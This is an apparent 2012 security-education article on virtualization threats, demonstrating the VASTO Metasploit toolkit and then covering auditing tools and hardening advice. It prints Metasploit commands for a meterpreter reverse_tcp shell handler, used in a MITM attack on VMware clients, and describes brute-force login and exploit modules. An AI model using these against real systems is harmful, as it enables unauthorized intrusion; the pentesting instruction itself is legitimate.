Virtualization Security: Hacking VMware with VASTO

Sudhanshu Chauhan
February 16, 2012 by
Sudhanshu Chauhan

With the advancement of the technology in the field of computers, requirement for hybrid setups has also escalated. Nowadays every company is using a heterogeneous infrastructure for its variety of tasks. Everybody utilizes a different blend of services, infrastructure and platforms for its operations and service delivery. Sometimes there is a requirement of more than one combination of these technologies; this is where virtualization comes in.

Virtualization can be described as the technique of abstracting physical resources, with the aim of simplification and utilization of the resources with ease. It enhances the capabilities of the present assets of any business and provides easy resources management and utilization, which otherwise would not have been possible. Virtualization can consist of anything from a hardware platform to a storage device or operating system etc. Figure 1 shows a simple hardware level virtualization.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Figure 1. A basic hardware level virtualization

Types of virtualization as described by Wikipedia at http://en.wikipedia.org/wiki/Virtualization are:

Hardware/Platform: Creation of a virtual machine that performs like an original computer with an operating system. The machine on which the virtualization takes place is the host machine and the virtual machine is the guest machine.

Desktop: Concept of separating the logical desktop from the physical machine. The user interacts with the host machine over a network using another device.

Software: OS level virtualization can be described as hosting of multiple virtualization environments within a single OS instance. Application virtualization is hosting of individual applications in an environment separated from the underlying OS. In service virtualization the behavior of dependent system component is emulated.

Memory: Gathering RAM resources from networked systems into a single memory pool.

Storage: Masking logical storage from physical storage.

Data: Presentation of data as an abstract layer.

Network: Creation of a virtualized network addressing space within or across network subnets.

Many factors need to be considered while virtualizing, like storage requirements, processing capabilities, and client cluster size. One thing which should be the top priority is security. Observing the recent trends in the field of computer technology, we can firmly state that cloud computing relies heavily (but not completely) on virtualization. This technology, being used around the globe, brings a serious question before us.

Is virtualization technology really secure, or are we just assuming it to be? Depending upon the cloud architecture, virtualization security can directly lead to cloud security.

People generally think of virtualization security to be the same as OS security, however it is vastly different. Intrusion into a single operating system will only affect that OS and its user(s), whereas intrusion into virtualization will compromise the whole environment. The intruder will be able to take control of all the virtualized operating systems and hence affect the user(s). The potential threats for virtualization is:

  • Guest to Guest
  • Host to Host
  • Guest to Host
  • Host to Guest
  • External to Guest
  • External to Host
  • A press release by Gartner (an information technology research and advisory firm), titled "60 Percent of Virtualized Servers Will Be Less Secure Than the Physical Servers They Replace Through 2012" outlines the six most common virtualization security risks. The risks are as follows:

    "Information Security Isn't Initially Involved in the Virtualization Projects

    A Compromise of the Virtualization Layer Could Result in the Compromise of All Hosted Workloads

    The Lack of Visibility and Controls on Internal Virtual Networks Created for VM-to-VM Communications Blinds Existing Security Policy Enforcement Mechanisms

    Workloads of Different Trust Levels Are Consolidated Onto a Single Physical Server Without Sufficient Separation

    Adequate Controls on Administrative Access to the Hypervisor/VMM Layer and to Administrative Tools Are Lacking

    There Is a Potential Loss of Separation of Duties for Network and Security Controls"

    The complete press release can be found at http://www.gartner.com/it/page.jsp?id=1322414.

    Keeping in mind the same problem, Claudio Criscione, a security researcher and consultant released VASTO. VASTO or Virtualization Assessment Toolkit is a first of its kind tool, designed with the sole purpose of assessing the security of different virtualization solutions including VMware, Oracle and Xen server. VASTO consists of a set of modules which can easily be integrated into existing exploitation framework Metasploit. The current version of VASTO is 0.4. The user simply needs to download it from http://vasto.nibblesec.org/VASTO.0.4.zip.

    Figure 2 demonstrates the process. I feel it is better if the user renames the extracted folder to VASTO. Further the folder needs to be copied into the Metasploit auxiliary directory (recursively –r). The Metasploit framework already consists of auxiliary modules for scanning VMware, and VASTO simply expands it.

    Figure 2. Downloading and extracting the toolkit

    To see all the modules present in VASTO simply input the following command into the msfconsole. The process is demonstrated in Figure 3.


    Msf > search vasto


    Figure 3. VASTO modules

    The vmware_version module is a very basic module and provides the functionality to test the version of the VMware application running at the specified addresses or subnet. This is useful for the recon phase of testing. It provides the tester with a clear picture of the testing environment and helps him/her decide to utilize specific exploits (if available). Figure 4 shows the execution of vmware_version module.

    Figure 4. vmware_version module in action (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    After the identification phase, the next best thing to do is to try to login into the machine using the vmware_login module. This module allows dictionary based as well as brute force login attempt and reports successful login attempt. This single module could allow the tester/intruder to own the machine if strong password policies are not in place.

    Figure 5. Successful login demonstrated using the vmware_login module (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    The next attack in the arsenal of VASTO is the lurking attack using the vmware_vilurker module. The dictionary meaning of lurking is to exist unobserved or unsuspected, and that is exactly what this module does.

    The vilurker module can perform user-assisted code execution, provided a Man-in-the-Middle (MITM) attack can be performed on the client.

    A Man-in-the-Middle (MITM) is a kind of attack in which the attacker sits between the victims by making independent connections and relaying messages between them. It's a kind of active eavesdropping. The victims believe that they are interacting directly to each other. The success of this attack depends on the fact that the attacker is successfully able to impersonate each endpoint to the satisfaction of the other. A more detailed description can be found at the OWASP website https://www.owasp.org/index.php/Man-in-the-middle_attack.

    After performing a MITM (using 'Cain & Able or 'ettercap') between the client and the server, the first step to perform this attack is to start a multi-handler in the second msfconsole. This will be used later to connect a meterpreter reverse_tcp shell. The handler can simply be started by inputting the following command in a separate meterpreter instance:


    msf > use multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST <Local Host IP here>

    msf exploit(handler) > exploit


    Now we need to set the necessary options in the first instance of the Metasploit, for the vilurker module and execute it using the run command. When the client tries to connect to the server, it will encounter a popup, which is actually a meterpreter payload. If the user executes this, the attacker will get a shell in his/her second meterpreter instance running the handler. Figure 6 and 7 demonstrate the vmware_vilurker module presenting the payload to the client and gaining a shell.

    Figure 6. vmware_vilurker module presenting a meterpreter payload to the user (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    Figure 7. Accessing the shell (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    A list of the modules present in VASTO is as following:

    abiquo_guest_stealer - Abiquo guest stealer

    abiquo_poison - Abiquo poison

    eucalyptus_bouncer - Eucalyptus Bouncer

    eucalyptus_poison - Eucalyptus Poison

    oraclevm_oravma_fileread - Oracle VM agent remote code execution

    vmware_autopwner - VMautopwn

    vmware_guest_stealer - VMware Guest Stealer

    vmware_login - VMware Login check scanner

    vmware_session_rider - VMware Session Rider

    vmware_studio_upload - VMware Studio< Remote Code Execution

    vmware_updatemanager_traversal - Update manager path traversal

    vmware_version - VMware products fingerprinter

    vmware_vilurker - VIlurker VIclient attack

    vmware_webaccess_portscan - VMware Web Access Relay Port Scanner

    xen_login - Xen Login Check Scanner

    oracle_oravma_exec - Oracle VM agent remote code execution

    vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

    vmware_tomcat_killer - VMware tomcat killer

    VASTO is one of its kind toolkit which provides the functionality to audit a virtual environment for all the layers:

    • Client
    • Hypervisor
    • Support
    • Management
    • Internal

    We hope that it will soon get updated with additional features and exploits to test the virtualization in greater depths.

    Another tool of the trade for virtualization security is VMinformer. VMinformer is not developed from an intruder's point of view, but from a security audit point of view. Unlike VASTO which provides the options of intrusion into the environment VMinformer allows auditing the environment based on security standards. A 14-day trial can be downloaded from http://www.vminformer.com.

    The main aim of VMinformer is to audit a virtual environment using policies. Policies are basically security benchmarks which can be molded according to the requirements. VMinformer generates a report after the audit based on the security / insecurity of the environment.

    VMinformer is simple to install and utilize. The first step the user needs to perform after the installation is to start a Policy Assessment Wizard as demonstrated in Figure 8. After inputting the server address and the credentials, the VMinformer will try to connect to the server. Then it provides the option to select the hosts and machines that need to be assessed and it inputs the root credentials for them.

    Figure 8. Input the server address and credentials

    Further the user can select the policies he/she wants to use to audit the environment with and start the scan. Once the scan is finished, it displays the results of the audit within the main dashboard.

    Figure 9 displays the interface of the application. The interface is divided into three main parts. The 'Environment' which displays the virtual machines in the environment. The 'Dashboard' which shows the result of the scan. The 'Summary' which presents the information about each issue. The VMinformer dashboard presents the results of the scan in a detailed manner, with a complete description of the issue, the entity involved, the risk level and the remedy.

    Figure 9. VMinformer interface

    After the completion of the assessment process the results can be saved in XML or PDF format. Currently VMinformer supports VMware virtualized OS, but support for other vendors can be expected in the near future. VMinformer provides complete visibility, assurance and control for the virtualization environment.

    VMinformer checks for the presence of:

    • Misconfiguration
    • Missing security patches
    • Bad network scheme
    • Weakness in management layers
    • Storage misconfiguration

    Ensuring secure communication between/with virtual machines is of utmost importance; hence some robust solutions are required. Such solutions are offered by Vyatta, in the form of Linux based open source software which provides services like routing, intrusion prevention system, and virtual private network, load balancing, etc. These virtual firewall and routers can easily be deployed on top of the hypervisor. Solutions provided by Vyatta like enterprise class the SPI firewall allows us to define and implement control policies. Remote access to the resources is secured using the encryption and authentication mechanisms. It also allows monitoring threats and stopping them. Considering the features and the open source nature of Vyatte Core software (VC), it's a must have product for every testing and development virtual environment. A copy of the product can be downloaded from http://www.vyatta.org/downloads.


    Virtualization technology provides easy maintenance and utilization of the resources. From the point of view of a pen tester it presents a vast platform where a single intrusion can lead towards the exploitation of a huge environment. Hence there is a need for inspecting virtualization security. Tools like VASTO and VMinformer provide worthy assistance in this direction. Security personnel need to follow some basic guidelines so that they can stop an intruder from taking over their virtualization environment.

    Patch everything: This is one of the basic practices in the field of cyber security, but often ignored. Everything from the virtualization system to the underlying operating systems and the applications running need to be patched regularly.

    Not exposing the test environment to the Internet: Exposing the environment to the open Internet poses a serious threat to the infrastructure, as a vulnerable application might lead to the exploitation of the complete environment. In case of exposure, proper isolation of other environments needs to be done.

    Strong password policies: Persons in charge of the security need to make sure that strong password policies are implemented and followed by employees.

    FREE role-guided training plans

    FREE role-guided training plans

    Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

    FREE role-guided training plans

    FREE role-guided training plans

    Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

    Education and awareness: It is said that the weakest link in the chain of security is people, hence employees need to be educated and made aware of the best security practices and how to implement them so that an ignorant employee does not lead to a compromised environment.

    Sudhanshu Chauhan
    Sudhanshu Chauhan

    Sudhanshu Chauhan is a researcher at InfoSec Institute. He is a B.Tech (CSE) graduate from Amity University. His areas of interest include (but are not limited to) Web Application Security and Bypasssing Security Measures(IDS/IPS, AV etc.).